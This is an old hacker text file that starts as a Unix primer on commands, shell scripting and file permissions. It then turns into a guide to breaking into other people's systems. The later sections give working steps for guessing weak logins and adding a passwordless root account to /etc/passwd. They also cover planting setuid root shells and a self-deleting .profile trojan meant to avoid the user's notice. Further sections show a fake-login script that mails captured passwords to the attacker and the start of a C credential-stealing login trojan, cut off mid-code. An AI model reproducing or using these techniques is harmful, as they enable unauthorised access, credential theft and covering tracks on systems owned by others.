WHen you have a command interpreter, the prompt is usually a:
$
when you are a root user the prompt is usually a:
#
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:
HI:

_____________________________________________________________________________

------------------------
SPecial Characters, ETc:
------------------------

Control-D : End of file. When using mail or a text editor, this will end
the message or text file. If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter. If you specified
something at the command line like "b?b" Unix would look for bob,bib,bub,
and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*"
it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
hi. "H*l" could by hill, hull, hl, and anything that starts with an
H and ends with an L.

[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob
if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The
[], ?, and * are usually used with copy, deleting files, and directory
listings.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not
the same thing. This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters. Most everything is lower case though.

----------------
Commands to use:
----------------

Now, I will rundown some of the useful commands of Unix. I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

example:
$ ls
hithere
runme
note.text
src
$
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
ex:
$ cat note.txt
This is a sample text file!
$

cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.
the dir1/etc.... describes the directory name. Say I want to get
to the root directory.
ex:
$ cd /
*ok, I'm there.*
$ ls
bin
sys
etc
temp
work
usr
all of the above are directories, lets say.
$ cd /usr
$ ls
sirhack
datawiz
prophet
src
violence
par
phiber
scythian
$ cd /usr/sirhack
$ ls
hithere
runme
note.text
src
$
ok, now, you do not have to enter the full dir name. if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
hithere
runme
note.text
src
runme2
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
hithere
runme
note.text
src
runit
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
hithere
runme
note.text
src
$ ls /usr/datwiz
runme
run

pwd - gives current directory
$ pwd
/usr/sirhack
$ cd src
$ pwd
/usr/sirhack/src
$ cd ..
$ pwd
/usr/sirhack
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
/usr/datwiz
$ cd $home
[goto home dir]
$ pwd
/usr/sirhack

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls
hithere
runme
src
$

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
hey!
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]
$

who [w,who,whodo] - print who is online
$ who
login term logontime
scythian + tty001 17:20
phiberO + tty002 15:50
sirhack + tty003 17:21
datawiz - tty004 11:20
glitch - tty666 66:60
$
the "who" commands may vary in the information given. a "+" means
you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry. syntax "man command name" This is a help
program. If you wanted to know how to use... "who" you'd type
$ man who
WHO(1) xxx......
and it would tell you.

stty - set your terminal characteristics. You WILL have to do "man stty"
since each stty is different, it seems like.
an example would be:
$ stty -parenb
to make the data params N,8,1. A lot of Unixes operate at
e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
$ sz filename
ready to send...
$ rz filename
please send your file....
...etc..

ed - text editor. Usage "ed filename" to create a file that doesn't
exist, just enter in "ed filename"
some versions of ed will give you a prompt, such as "*" others will not
$ ed newtext
0
* a
This is line 1
This is line 2
[control-z]
* 1 [to see line one]
This is line 1
* a [keep adding]
This is line 3
[control-z]
*0a [add after line 0]
This is THE first line
[control-z]
1,4l
This is THE first line
This is line 1
This is line 2
This is line 3
* w
71
* q
$
The 71 is number of bytes written.
a = append
l = list
# = print line number
w - write
l fname = load fname
s fname = save to fname
w = write to current file
q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
$
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
$
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext
$

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
is:
"mail username@address" or
"mail username"
or
"mail"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik
then look like this to the computer:

mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber. I'd do this if there were no smart mailer:

$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Hey Guy. Whats up? Well, gotta go. Nice long message huh?
[control-D]
$
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to. Then type in your message. Then
end it with a control-D.

To read YOUR mail, just type in mail. IE:

$ mail

From scythian ............
To sirhack ............
Subject: Well....

Arghhh!

?
The dots represent omitted crap. Each Mail program makes its own headings.
That ? is a prompt. At this prompt I can type:

d - delete
f username - forward to username
w fname - write message to a file named fname
s fname - save message with header into file
q - quit / update mail
x - quit, but don't change a thing
m username - mail to username
r - reply
[enter] - read next message
+ - go forward one message
- : go back one
h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter. A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail. Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
running:
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed
$ kill -9 122
garbage
NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines. Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.


First, lets get into variables. Variables obviously can be assigned
values. These values can be string values, or numberic values.

number=1

That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

Both would assign "Hi there" to a variable.

Using a variable is different though. When you wish to use a variable
you must procede it with a dollar ($) sign. These variables can
be used as arguments in programs. When I said that scripts are
like batch files, I meant it. You can enter in any name of a program
in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"

ps $arg1 $arg2

echo $counter

That script would translate to "ps -uf scythian" then would print
"1" after that was finished. ECHO prints something on the screen
whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable. format : read variable . No dollar
sign is needed here! If I wwanted to get someone's name, I could
put:

echo "What is your name?"
read hisname
echo Hello $hisname

What is your name?
Sir Hackalot
Hello Sir Hackalot

Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
format: trap "command ; command ; command ; etc.."
Example:
trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
'You gotta see this through!'"

Now, if I hit control-c during the script after this statement was
executed, I'd get:
Noway!! You are not getting rid of me that easy
You gotta see this through!

exit : format :exit [num] This exists the shell [quits] with return
code of num.

-----
CASE
-----

Case execution is like a menu choice deal. The format of the command
or structure is :
case variable in
1) command;
command;;
2) command;
command;
command;;
*) command;;
esac
Each part can have any number of commands. The last command however
must have a ";;". Take this menu:

echo "Please Choose:"
echo "(D)irectory (L)ogoff (S)hell"
read choice
case $choice in

D) echo "Doing Directory...";
ls -al ;;
L) echo Bye;
kill -1 0;;
S) exit;;
*) Echo "Error! Not a command";;
esac

The esac marks the end of a case function. It must be after the
LAST command.

Loops
-----

Ok, loops. There are two loop functins. the for loops, and the
repeat.

repeat looks like this: repeat something somethin1 somethin2
this would repeat a section of your script for each "something".
say i did this:
repeat scythian sirhack prophet

I may see "scythian" then sirhack then prophet on my screen.

The for loop is defined as "for variable in something
do
..
..
done"

an example:
for counter in 1 2 3
do
echo $counter
done

That would print out 1 then 2 then 3.

Using TEST
----------
The format: Test variable option variable

The optios are:
-eq =
-ne <> (not equal)
-gt >
-lt <
-ge >=
-le <=

for strings its: = for equal != for not equal.

If the condition is true, a zero is returned. Watch:

test 3 -eq 3

that would be test 3 = 3, and 0 would be returned.

EXPR
----

This is for numeric functions. You cannot simply type in
echo 4 + 5
and get an answer most of the time. you must say:
expr variable [or number] operator variable2 [or number]
the operators are:

+ add
- subtract
* multiply
/ divide
^ - power (on some systems)

example : expr 4 + 5
var = expr 4 + 5
var would hold 9.

On some systems, expr sometimes prints out a formula. I mean,
22+12 is not the same as 22 + 12. If you said expr 22+12 you
would see:
22+12
If you did expr 22 + 12 you'd see:
34


SYSTEM VARIABLES
----------------

These are variables used by the shell, and are usually set in the
system wide .profile [explained later].

HOME - location of your home directory.
PS1 - The prompt you are given. usually $ . On BSD its usually &
PATH - This is the search path for programs. When you type in a program
to be run, it is not in memory; it must be loaded off disk. Most commands
are not in Memory like MSDOS. If a program is on the search path, it may
be executed no matter where you are. If not, you must be in the directory
where the program is. A path is a set of directories basically, seperated by
":"'s. Here is a typical search path:

:/bin:/etc:/usr/lbin:$HOME:

When you tried to execute a program, Unix would look for it in /bin,
/etc, /usr/lbin, and your home directory, and if its not found, an error is
spewed out. It searches directories in ORDER of the path. SO if you had a
program named "sh" in your home directory, and typed in "sh", EVEN if
you were in your home dir, it would execute the one in /bin. So, you
must set your paths wisely. Public access Unixes do this for you, but systems
you may encounter may have no path set.

TERM - This is your terminal type. UNIX has a library of functions called
"CURSES" which can take advantage of any terminal, provided the escape
codes are found. You must have your term set to something if you run
screen oriented programs. The escape codes/names of terms are found
in a file called TERMCAP. Don't worry about that. just set your term
to ansi or vt100. CURSES will let you know if it cannot manipulate your
terminal emulation.


-------------------
The C compiler
-------------------

This Will be BRIEF. Why? Becuase if you want to learn C, go
buy a book. I don't have time to write another text file on
C, for it would be huge. Basically, most executables are programmed
in C. Source code files on unix are found as filename.c .
To compile one, type in "cc filename.c". Not all C programs
will compile, since they may depend on other files not there, or
are just modules. If you see a think called "makefile" you can
usually type in just "make" at the command prompt, and something
will be compiled, or be attempted to compile. When using make or
CC, it would be wise to use the background operand since
compiling sometimes takes for ever.
IE:
$ cc login.c&
[1234]
$
(The 1234 was the process # it got identified as).


_____________________________________________________________________________

---------------
The FILE SYSTEM
---------------

This is an instrumental part of UNIX. If you do not understand this
section, you'll never get the hang of hacking Unix, since a lot of Pranks
you can play, and things you can do to "raise your access" depend on it.

First, Let's start out by talking about the directory structure. It is
basically a Hiearchy file system, meaning, it starts out at a root directory
and expands, just as MSDOS, and possibly AmigaDos.

Here is a Directory Tree of sorts: (d) means directory

/ (root dir)

--------------------
bin (d) usr (d)
----^--------------------

sirhack(d) scythian (d) prophet (d)

src (d)

Now, this particular system contains the following directories:
/
/bin
/usr
/usr/sirhack
/usr/sirhack/src
/usr/scythian
/usr/prophet

Hopefully, you understood that part, and you should. Everything spawns from
the root directory.

o File Permissions!
------------------

Now, this is really the biggie. File Permissions. It is not that hard to
understand file permissions, but I will explain them deeply anyway.

OK, now you must think of user groups as well as user names. Everyone
belongs to a group. at the $ prompt, you could type in 'id' to see what
group you are in. Ok, groups are used to allow people access certain things,
instead of just having one person controlling/having access to certain files.
Remember also, that Unix looks at someone's UID to determine access, not
user name.

Ok. File permissions are not really that complicated. Each file has an owner
This OWNER is usually the one who creates the file, either by copying a file
or just by plain editing one. The program CHOWN can be used to give someone
ownership of a file. Remember that the owner of a file must be the one who
runs CHOWN, since he is the only one that can change the permissions of a file
Also, there is a group owner, which is basically the group that you were in
when the file was created. You would use chgrp to change the group a file is
in.

Now, Files can have Execute permissions, read permissions, or write permission.
If you have execute permission, you know that you can just type in the name
of that program at the command line, and it will execute. If you have read
permission on a file, you can obviously read the file, or do anything that
reads the file in, such as copying the file or cat[ing] it (Typing it).
If you do NOT have access to read a file, you can't do anything that requires
reading in the file. This is the same respect with write permission. Now,
all the permissions are arranged into 3 groups. The first is the owner's
permissions. He may have the permissions set for himself to read and execute
the file, but not write to it. This would keep him from deleting it.
The second group is the group permissions. Take an elongated directory
for an example:
$ ls -l runme
r-xrwxr-- sirhack root 10990 March 21 runme

ok. Now, "root" is the groupname this file is in. "sirhack" is the owner.
Now, if the group named 'root' has access to read, write and execute, they
could do just that. Say .. Scythian came across the file, and was in the root
user group. He could read write or execute the file. Now, say datawiz came
across it, but was in the "users" group. The group permissions would not
apply to him, meaning he would have no permissions, so he couldn't touch
the file, right? Sorta. There is a third group of permissions, and this is
the "other" group. This means that the permissions in the "other" group
apply to everyone but the owner, and the users in the same group as the file.
Look at the directory entry above. the r-x-rwxr-- is the permissions line.
The first three characters are the permissions for the owner (r-x). The
"r-x" translates to "Read and execute permissions, but no write permissions"
the second set of three, r-xRWXr-- (the ones in capital letters) are the group
permissions. Those three characters mean "Read, write, and execution allowed"
The 3rd set, r-xrwxR-- is the permissions for everyone else. It means
"Reading allowed, but nothing else". A directory would look something like
this:
$ ls -l
drwxr-xr-x sirhack root 342 March 11 src

A directory has a "d" at the beggining of the permissions line. Now, the
owner of the directory (sirhack) can read from the directory, write in the
directory, and execute programs from the directory. The root group and every-
one else can only read from the directory, and execute off the directory.
So, If I changed the directory to be executable only, this is
what it would look like:
$ chmod go-r
$ ls
drwx--x--x sirhack root 342 March 11 src

Now, if someone went into the directory besides "sirhack", they could only
execute programs in the directory. If they did an "ls" to get a directory
of src, when they were inside src, it would say "cannot read directory".
If there is a file that is readable in the directory, but the directory is
not readable, it is sometimes possible to read the file anyway.

If you do not have execute permissions in a directory, you won't be able to
execute anything in the directory, most of the time.

_____________________________________________________________________________

--------------
Hacking:
--------------
The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section. Hacking can also be just to get other's accounts also.

Getting IN
----------
The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"

or Just
"Young Inc. Please login"

Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering. Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.

Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
of command logins. These are ones which simply execute a command, then
logoff. However, the commands they execute are usually useful. For instance
there are three common command logins that tell you who is online at the
present time. They are:
who
rwho
finger

If you ever successfully get one of these to work, you can write down
the usernames of those online, and try to logon as them. Lots of unsuspecting
users use there login name as their password. For instance, the user
"bob" may have a password named "bob" or "bob1". This, as you know, is
not smart, but they don't expect a hacking spree to be carried out on
them. They merely want to be able to login fast.
If a command login does not exist, or is not useful at all, you will
have to brainstorm. A good thing to try is to use the name of the unix
that it is identified as. For instance, Young INC's Unix may have an account
named "young"
Young, INC. Please Login.
login: young
UNIX SYSTEM V REL 3.2
(c)1984 AT&T..
..
..
..

Some unixes have an account open named "test". This is also a default,
but surprisingly enough, it is sometimes left open. It is good to try to
use it. Remember, brainstorming is the key to a unix that has no apparent
defaults open. Think of things that may go along with the Unix. type
in stuff like "info", "password", "dial", "bbs" and other things that
may pertain to the system. "att" is present on some machines also.

ONCE INSIDE -- SPECIAL FILES
----------------------------
There are several files that are very important to the UNIX
environment. They are as follows:

/etc/passwd - This is probably the most important file on a Unix. Why?
well, basically, it holds the valid usernames/passwords.
This is important since only those listed in the passwd
file can login, and even then some can't (will explain).
The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh

In the first line, sirhack is a valid user. The second
field, however, is supposed to be a password, right? Well,
it is, but it's encrypted with the DES encryption standard.
the part that says "&a,Ty" may include a date after the comma
(Ty) that tells unix when the password expires. Yes, the
date is encrypted into two alphanumeric characters (Ty).

In the Second example, the demo account has no password.
so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T
..
..

But with sirhack, you'd have to enter a password. Now,
the password file is great, since a lot of times, you;ll
be able to browse through it to look for unpassworded
accounts. Remember that some accounts can be restricted
from logging in, as such:

bin:*:2:2:binaccount:/bin:/bin/sh

The '*' means you won't be able to login with it. Your
only hope would be to run an SUID shell (explained later).

A note about the DES encryption: each unix makes its own unique
"keyword" to base encryption off of. Most of the time its just random letters
and numbers. Its chosen at installation time by the operating system.
Now, decrypting DES encrypted things ain't easy. Its pretty much
impossible. Especially decrypting the password file (decrypting the password
field within the password file to be exact). Always beware a hacker who
says he decrypted a password file. He's full of shit. Passwords are
never decrypted on unix, but rather, a system call is made to a function
called "crypt" from within the C language, and the string you enter as
the password gets encrypted, and compared to the encrypted password. If
they match, you're in. Now, there are password hackers, but they donot
decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until it finds
a match (later on!). Remember, few, if none, have decrypted the password
file successfuly.

/etc/group - This file contains The valid groups. The group file is usually
defined as this:
groupname:password:groupid:users in group

Once again, passwords are encrypted here too. If you see a blank
in the password entry you can become part of that group by
using the utility "newgrp". Now, there are some cases in
which even groups with no password will allow only certain
users to be assigned to the group via the newgrp command. Usually,
if the last field is left blank, that means any user can use newgrp
to get that group's access. Otherwise, only the users specified in
the last field can enter the group via newgrp.

Newgrp is just a program that will change your group current
group id you are logged on under to the one you specify. The
syntax for it is: newgrp groupname
Now, if you find a group un passworded, and use newgrp to
enter it, and it asks for a password, you are not allowed to use
the group. I will explain this further in The "SU & Newgrp" section.

/etc/hosts - this file contains a list of hosts it is connected to thru
a hardware network (like an x.25 link or something), or sometimes
just thru UUCP. This is a good file when you are hacking a
large network, since it tells you systems you can use with
rsh (Remote Shell, not restricted shell), rlogin, and telnet,
as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
Several directories, but it is usually in /usr/adm. This file
is what it sounds like. Its a log file, for the program SU.
What it is for is to keep a record of who uses SU and when.
whenever you use SU, your best bet would be to edit this file
if possible, and I'll tell you how and why in the section
about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog -
This is a log file, keeping track of the logins.
Its purpose is merely for accounting and "security review". Really,
sometimes this file is never found, since a lot of systems keep the
logging off.

/usr/adm/errlog
or errlog - This is the error log. It could be located anywhere. It
keeps track of all serious and even not so serious errors.
Usually, it will contain an error code, then a situation.
the error code can be from 1-10, the higher the number, the
worse the error. Error code 6 is usually used when you try
to hack. "login" logs your attempt in errlog with error code
6. Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu,
where you called and so forth. Another security thing.

/usr/mail/ - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.


-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
Set The User ID
-------------------

This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme
#

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).


How do I get root?
------------------

Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk
about.

More on setting the UID
-----------------------

Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.



II. HACKING : Bad Directory Permissions

Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *


The BEST thing that could happen is to find a user's directory writeable
by you. Why? well, you could replace all the files in the directory
with your own devious scripts, or C trojans. Even if a file is not
writeable by you, you can still overwrite it by deleteing it. If you
can read various files, such as the user's .profile, you can make a
self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro

What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and
mess him up bad enough to force a logoff, creating a detached
account. Then you can execute a trojan horse off that terminal in
place of login or something, so the next one who calls can hit the
trojan horse. This USUALLY takes the form of a fake login and
write the username/pw entererred to disk.

Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for
the self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" mail you

Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have it look like SU, so you can get the root password. But
make sure the program deletes itself. Here is a sample trojan
login in C:

#include
/* Get the necessary defs.. */
main()
{
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
gets(name);
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
fclose(strm);
/* put some kind of error below... or something... */
